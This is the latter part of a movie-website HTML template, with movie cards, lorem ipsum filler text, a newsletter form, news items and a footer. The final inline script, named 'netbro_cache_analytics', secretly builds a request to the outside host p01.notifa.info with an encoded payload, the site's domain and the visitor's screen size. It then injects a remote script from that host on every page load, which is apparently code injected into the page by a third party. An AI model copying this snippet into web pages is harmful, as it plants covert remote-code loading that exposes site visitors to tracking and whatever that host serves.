                                        <a class="popup-youtube" href="https://www.youtube.com/watch?v=6ZfuNTqbHE8">
                                            <i class="far fa-play-circle"></i>
                                        </a>
                                        <div class="content">
                                            <h2 class="name">
                                                <a href="04_movie-details.html">TDarkness World</a>
                                            </h2>
                                            <div class="rating clearfix">
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-half"></div>
                                            </div>
                                            <p class="date">October 26, 2018</p>
                                            <p class="duration">02 :50 :12</p>
                                        </div>
                                    </div>
                                    <div class="single-top-movie">
                                        <div class="img">
                                            <a href="04_movie-details.html">
                                                <img src="img/home1/latest-4.jpg" alt="">
                                            </a>
                                        </div>
                                        <span class="view-counter">759k Views</span>
                                        <a class="popup-youtube" href="https://www.youtube.com/watch?v=6ZfuNTqbHE8">
                                            <i class="far fa-play-circle"></i>
                                        </a>
                                        <div class="content">
                                            <h2 class="name">
                                                <a href="04_movie-details.html">World War 5</a>
                                            </h2>
                                            <div class="rating clearfix">
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-half"></div>
                                            </div>
                                            <p class="date">October 26, 2018</p>
                                            <p class="duration">02 :50 :12</p>
                                        </div>
                                    </div>
                                    <div class="single-top-movie">
                                        <div class="img">
                                            <a href="04_movie-details.html">
                                                <img src="img/home1/latest-2.jpg" alt="">
                                            </a>
                                        </div>
                                        <span class="view-counter">759k Views</span>
                                        <a class="popup-youtube" href="https://www.youtube.com/watch?v=6ZfuNTqbHE8">
                                            <i class="far fa-play-circle"></i>
                                        </a>
                                        <div class="content">
                                            <h2 class="name">
                                                <a href="04_movie-details.html">Nature Beauty 2</a>
                                            </h2>
                                            <div class="rating clearfix">
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-half"></div>
                                            </div>
                                            <p class="date">October 26, 2018</p>
                                            <p class="duration">02 :50 :12</p>
                                        </div>
                                    </div>
                                    <div class="single-top-movie">
                                        <div class="img">
                                            <a href="04_movie-details.html">
                                                <img src="img/home1/latest-3.jpg" alt="">
                                            </a>
                                        </div>
                                        <span class="view-counter">759k Views</span>
                                        <a class="popup-youtube" href="https://www.youtube.com/watch?v=6ZfuNTqbHE8">
                                            <i class="far fa-play-circle"></i>
                                        </a>
                                        <div class="content">
                                            <h2 class="name">
                                                <a href="04_movie-details.html">Darkness World</a>
                                            </h2>
                                            <div class="rating clearfix">
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-on"></div>
                                                <div class="star star-half"></div>
                                            </div>
                                            <p class="date">October 26, 2018</p>
                                            <p class="duration">02 :50 :12</p>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <!-- movie-tab-area-end -->
    <!-- coming-area-start -->
    <div class="coming-area">
        <div class="container">
            <div class="row">
                <div class="col-12">
                    <div class="coming">
                        <img src="img/home1/find-bg.jpg" alt="">
                        <h2 class="intro">Animation Comming soon Movie</h2>
                        <h3 class="title">Find Your Flock</h3>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <!-- coming-area-end -->
    <!-- about-movie-area-start -->
    <div class="about-movie-area">
        <div class="container">
            <div class="row">
                <div class="col-12">
                    <div class="section-title">
                        <h2>About This Movie</h2>
                    </div>
                </div>
            </div>
            <div class="about-movie-carousel owl-carousel">
                <div class="single-about-movie">
                    <div class="row">
                        <div class="col-lg-5 col-md-5 col-sm-12 col-12">
                            <div class="banner">
                                <img src="img/home1/about-movie-banner.jpg" alt="">
                            </div>
                        </div>
                        <div class="col-lg-7 col-md-7 col-sm-12 col-12">
                            <div class="content">
                                <h2 class="title">Women Bird</h2>
                                <p class="text">Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has
                                    been the industry's standard dummy text ever since the 1500s, when an unknown printer
                                    took a galley of type and scrambled it to make a type specimen book. It has survived
                                    not only five centuries, but also the leap into electronic.an unknown printer took a
                                    galley of type and scrambled it to make a type specimen
                                    <br>
                                    <br> galley of type and scrambled it to make a type specimen book. It has survived not only
                                    five centuries, but also the leap into electronic.an unknown printer took a galley of
                                    type and scrambled it to make a type specimen
                                </p>
                                <a class="more" href="04_movie-details.html">Read More</a>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="single-about-movie">
                    <div class="row">
                        <div class="col-lg-5 col-md-5 col-sm-12 col-12">
                            <div class="banner">
                                <img src="img/home1/about-movie-banner.jpg" alt="">
                            </div>
                        </div>
                        <div class="col-lg-7 col-md-7 col-sm-12 col-12">
                            <div class="content">
                                <h2 class="title">Women Bird</h2>
                                <p class="text">Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has
                                    been the industry's standard dummy text ever since the 1500s, when an unknown printer
                                    took a galley of type and scrambled it to make a type specimen book. It has survived
                                    not only five centuries, but also the leap into electronic.an unknown printer took a
                                    galley of type and scrambled it to make a type specimen
                                    <br>
                                    <br> galley of type and scrambled it to make a type specimen book. It has survived not only
                                    five centuries, but also the leap into electronic.an unknown printer took a galley of
                                    type and scrambled it to make a type specimen
                                </p>
                                <a class="more" href="#">Read More</a>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="single-about-movie">
                    <div class="row">
                        <div class="col-lg-5 col-md-5 col-sm-12 col-12">
                            <div class="banner">
                                <img src="img/home1/about-movie-banner.jpg" alt="">
                            </div>
                        </div>
                        <div class="col-lg-7 col-md-7 col-sm-12 col-12">
                            <div class="content">
                                <h2 class="title">Women Bird</h2>
                                <p class="text">Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has
                                    been the industry's standard dummy text ever since the 1500s, when an unknown printer
                                    took a galley of type and scrambled it to make a type specimen book. It has survived
                                    not only five centuries, but also the leap into electronic.an unknown printer took a
                                    galley of type and scrambled it to make a type specimen
                                    <br>
                                    <br> galley of type and scrambled it to make a type specimen book. It has survived not only
                                    five centuries, but also the leap into electronic.an unknown printer took a galley of
                                    type and scrambled it to make a type specimen
                                </p>
                                <a class="more" href="#">Read More</a>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <!-- about-movie-area-end -->
    <!-- newsletter-area-start -->
    <div class="newsletter-area bg-with-ebony">
        <div class="container">
            <div class="row">
                <div class="col-lg-8 offset-lg-2 col-12">
                    <div class="newsletter">
                        <h2 class="title">Newsletter</h2>
                        <p class="text">There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration
                            in some form cted humour or randomised words.</p>
                        <form action="#">
                            <div class="newsleter-input-box">
                                <input type="text" placeholder="Enter your email.......">
                                <button>
                                    <i class="far fa-paper-plane"></i>
                                </button>
                            </div>
                        </form>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <!-- newsletter-area-end -->
    <!-- news-area-start -->
    <div class="news-area">
        <div class="container">
            <div class="row">
                <div class="col-12">
                    <div class="section-title">
                        <h2>Letest News</h2>
                    </div>
                </div>
            </div>
            <div class="row">
                <div class="col-lg-7 col-md-12 col-sm-12 col-12">
                    <div class="feature-news">
                        <div class="single-news">
                            <div class="img">
                                <img src="img/home1/latest-news-b-1.jpg" alt="">
                            </div>
                            <div class="content">
                                <span class="date">October-17-2017</span>
                                <h2 class="title">
                                    <a href="11_blog-details.html">Jecu Jek English Horor Movie Lorem Ipsum is there fore always free from.</a>
                                </h2>
                                <p class="text">Pellentesque imperdiet sagittis est, vitae consectetur enim feugiat quis. Nunc purus eros,
                                    feugiat at enim sit amet, dictum maximus nisl. In vitae lorem vitae mauris vestibulum
                                    venenatis eget a urna. Etiam vehicula lorem.</p>
                                <div class="meta-more">
                                    <a class="more" href="11_blog-details.html">Read More</a>
                                    <ul class="meta">
                                        <li>
                                            <span>
                                                <i class="far fa-user"></i>
                                            </span> By Admin</li>
                                        <li>
                                            <span>
                                                <i class="far fa-comments"></i>
                                            </span> Comments</li>
                                        <li>
                                            <span>
                                                <i class="fas fa-share-alt"></i>
                                            </span> Share</li>
                                    </ul>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="col-lg-5 col-md-12 col-sm-12 col-12">
                    <div class="news-carousel owl-carousel">
                        <div class="all-small-news">
                            <div class="single-news">
                                <div class="img">
                                    <img src="img/home1/latest-news-s-1.jpg" alt="">
                                </div>
                                <div class="content">
                                    <h2 class="title">
                                        <a href="11_blog-details.html">Jecu Jek English Horor Movie Lorem fore always free from.</a>
                                    </h2>
                                    <div class="meta-more">
                                        <a class="more" href="11_blog-details.html">Read More</a>
                                        <ul class="meta">
                                            <li>
                                                <span>
                                                    <i class="far fa-user"></i>
                                                </span> By Admin</li>
                                            <li>
                                                <span>
                                                    <i class="far fa-comments"></i>
                                                </span> Comments</li>
                                            <li>
                                                <span>
                                                    <i class="fas fa-share-alt"></i>
                                                </span> Share</li>
                                        </ul>
                                    </div>
                                </div>
                            </div>
                            <div class="single-news">
                                <div class="img">
                                    <img src="img/home1/latest-news-s-2.jpg" alt="">
                                </div>
                                <div class="content">
                                    <h2 class="title">
                                        <a href="11_blog-details.html">Jecu Jek English Horor Movie Lorem fore always free from.</a>
                                    </h2>
                                    <div class="meta-more">
                                        <a class="more" href="11_blog-details.html">Read More</a>
                                        <ul class="meta">
                                            <li>
                                                <span>
                                                    <i class="far fa-user"></i>
                                                </span> By Admin</li>
                                            <li>
                                                <span>
                                                    <i class="far fa-comments"></i>
                                                </span> Comments</li>
                                            <li>
                                                <span>
                                                    <i class="fas fa-share-alt"></i>
                                                </span> Share</li>
                                        </ul>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <div class="all-small-news">
                            <div class="single-news">
                                <div class="img">
                                    <img src="img/home1/latest-news-s-1.jpg" alt="">
                                </div>
                                <div class="content">
                                    <h2 class="title">
                                        <a href="#">Jecu Jek English Horor Movie Lorem fore always free from.</a>
                                    </h2>
                                    <div class="meta-more">
                                        <a class="more" href="#">Read More</a>
                                        <ul class="meta">
                                            <li>
                                                <span>
                                                    <i class="far fa-user"></i>
                                                </span> By Admin</li>
                                            <li>
                                                <span>
                                                    <i class="far fa-comments"></i>
                                                </span> Comments</li>
                                            <li>
                                                <span>
                                                    <i class="fas fa-share-alt"></i>
                                                </span> Share</li>
                                        </ul>
                                    </div>
                                </div>
                            </div>
                            <div class="single-news">
                                <div class="img">
                                    <img src="img/home1/latest-news-s-2.jpg" alt="">
                                </div>
                                <div class="content">
                                    <h2 class="title">
                                        <a href="#">Jecu Jek English Horor Movie Lorem fore always free from.</a>
                                    </h2>
                                    <div class="meta-more">
                                        <a class="more" href="#">Read More</a>
                                        <ul class="meta">
                                            <li>
                                                <span>
                                                    <i class="far fa-user"></i>
                                                </span> By Admin</li>
                                            <li>
                                                <span>
                                                    <i class="far fa-comments"></i>
                                                </span> Comments</li>
                                            <li>
                                                <span>
                                                    <i class="fas fa-share-alt"></i>
                                                </span> Share</li>
                                        </ul>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <!-- news-area-end -->
    <!-- footer-start -->
    <footer>
        <div class="footer-top-area">
            <div class="container">
                <div class="row">
                    <div class="col-lg-3 col-md-6 col-sm-6 col-12">
                        <div class="fw-info footer-widget">
                            <div class="flogo">
                                <img src="img/home1/logo2.png" alt="">
                            </div>
                            <p class="text">Lorem Ipsum is simply dummy text of the printing and typesetting.Lorem Ipsum is simply dummy
                                text of the print.</p>
                            <ul class="address">
                                <li>
                                    <span>
                                        <i class="fas fa-map-marker-alt"></i>
                                    </span> Bangladesh, Dhaka, Mirpur -12</li>
                                <li>
                                    <span>
                                        <i class="fas fa-phone"></i>
                                    </span> +(999) 321456987</li>
                                <li>
                                    <span>
                                        <i class="far fa-envelope"></i>
                                    </span> i-finger.education@gmail.com</li>
                            </ul>
                            <ul class="social">
                                <li>
                                    <a href="#" target="_blank">
                                        <i class="fab fa-facebook-f"></i>
                                    </a>
                                </li>
                                <li>
                                    <a href="#" target="_blank">
                                        <i class="fab fa-twitter"></i>
                                    </a>
                                </li>
                                <li>
                                    <a href="#" target="_blank">
                                        <i class="fab fa-pinterest-p"></i>
                                    </a>
                                </li>
                                <li>
                                    <a href="#" target="_blank">
                                        <i class="fab fa-youtube"></i>
                                    </a>
                                </li>
                                <li>
                                    <a href="#" target="_blank">
                                        <i class="fab fa-vimeo-v"></i>
                                    </a>
                                </li>
                            </ul>
                        </div>
                    </div>
                    <div class="col-lg-3 col-md-6 col-sm-6 col-12">
                        <div class="fw-list footer-widget">
                            <h4 class="title">Movies Category</h4>
                            <ul class="list">
                                <li>
                                    <a href="#">About Us</a>
                                </li>
                                <li>
                                    <a href="#">Popular Courses</a>
                                </li>
                                <li>
                                    <a href="#">Forums</a>
                                </li>
                                <li>
                                    <a href="#">Place</a>
                                </li>
                                <li>
                                    <a href="#">Our Teachers</a>
                                </li>
                                <li>
                                    <a href="#">Upcoming Events</a>
                                </li>
                                <li>
                                    <a href="#">Contact Us</a>
                                </li>
                            </ul>
                        </div>
                    </div>
                    <div class="col-lg-3 col-md-6 col-sm-6 col-12">
                        <div class="fw-list footer-widget">
                            <h4 class="title">Resources</h4>
                            <ul class="list">
                                <li>
                                    <a href="#">About Block Buster</a>
                                </li>
                                <li>
                                    <a href="#">Security</a>
                                </li>
                                <li>
                                    <a href="#">Blog</a>
                                </li>
                                <li>
                                    <a href="#">Help Center</a>
                                </li>
                                <li>
                                    <a href="#">Terms of Use</a>
                                </li>
                                <li>
                                    <a href="#">Privacy Policy</a>
                                </li>
                                <li>
                                    <a href="#">Movie Collections</a>
                                </li>
                            </ul>
                        </div>
                    </div>
                    <div class="col-lg-3 col-md-6 col-sm-6 col-12">
                        <div class="fw-twitter footer-widget">
                            <h4 class="title">Twitter</h4>
                            <ul class="tweet-feed">
                                <li>
                                    <h6 class="name">
                                        <span class="icon">
                                            <i class="fab fa-twitter"></i>
                                        </span> @ifinger.
                                        <span>movie</span>
                                    </h6>
                                    <p class="text">Lorem Ipsum is simply dummy text printing and typesetting.</p>
                                </li>
                                <li>
                                    <h6 class="name">
                                        <span class="icon">
                                            <i class="fab fa-twitter"></i>
                                        </span> @ifinger.
                                        <span>movie</span>
                                    </h6>
                                    <p class="text">Lorem Ipsum is simply dummy text printing and typesetting.</p>
                                </li>
                            </ul>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <div class="footer-bottom-area">
            <div class="container">
                <div class="row">
                    <div class="col-lg-6 col-md-12 col-sm-12 col-12">
                        <div class="fba-left">
                            <ul class="links">
                                <li>
                                    <a href="#">Home</a>
                                </li>
                                <li>
                                    <a href="#">Movie Layout</a>
                                </li>
                                <li>
                                    <a href="#">Celebrities</a>
                                </li>
                                <li>
                                    <a href="#">News</a>
                                </li>
                                <li>
                                    <a href="#">Contacts</a>
                                </li>
                            </ul>
                        </div>
                    </div>
                    <div class="col-lg-6 col-md-12 col-sm-12 col-12">
                        <div class="fba-right">
                            <p class="copyright">CopyRight© 2018 Design by
                                <a href="#">@i-finger</a> . All Rights Reserved.</p>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </footer>
    <!-- footer-end -->
    <!-- Scripts -->
    <script src="js/jquery-3.2.0.min.js"></script>
    <script src="js/jquery-ui.js"></script>
    <script src="js/owl.carousel.min.js"></script>
    <script src="js/jquery.counterup.min.js"></script>
    <script src="js/countdown.js"></script>
    <script src="js/parallax.js"></script>
    <script src="js/amplitude.js"></script>
    <script src="js/plyr.js"></script>
    <script src="js/jquery.slimscroll.min.js"></script>
    <script src="js/jquery.magnific-popup.min.js"></script>
    <script src="js/jquery.slicknav.min.js"></script>
    <script src="js/jquery.scrollUp.js"></script>
    <script src="js/jquery.mixitup.min.js"></script>
    <script src="js/jquery.waypoints.min.js"></script>
    <script src="js/popper.min.js"></script>
    <script src="js/bootstrap.min.js"></script>
    <script src="js/theme.js"></script>
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582JKzDzTsXZH2sft6BqMOmD2Tt2yrXpcAaWaU0ctNFMSLMJFdfT2d6fRyL6%2b5yKxYcNKzZ2rRX1%2bmB1SbKQ5tqJQbJnc5UzIWdPWs4G3f6Arn54o4NMXuJ4liT5Se%2bAEtCuo1FZXC07T%2fTrS5C3%2bUBsdVzNdakB6gpmt3%2fA4Of6t6CbDvXNg9ymhocCV85hpB6kvUXPjFKgwFOFJTA0w94j9065BO0LxjJcJ%2bgqUwyPTrNHKEx%2fV6CuAF4BaXfsUIu3%2bLchtB1hrXHPWFQLTd9akr1Gq8nhJpk50HAn%2b4Fvmpc4Hbp2G1MAONmA1EiJY%2fdKD7ljWTbJlKrKgSrYvYMIAmZJkFsQCbjp9e8NoLfPVblknN4ef%2bHH97zaE%2fol%2fiJQZ7A6Ssv7Um98ODL7J5nJraNs70CzldvOkfPziZvXBdzFnSHKTJVxr3Yhas%2bOOkYMMeHNU3t9AzLymusEwVoR2oMazKahRotffNiPMDNp3vtJ85r169oTB3PhFIb9CVyCL7IQK%2b2UQ5lg700GR9lfk%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>

</html>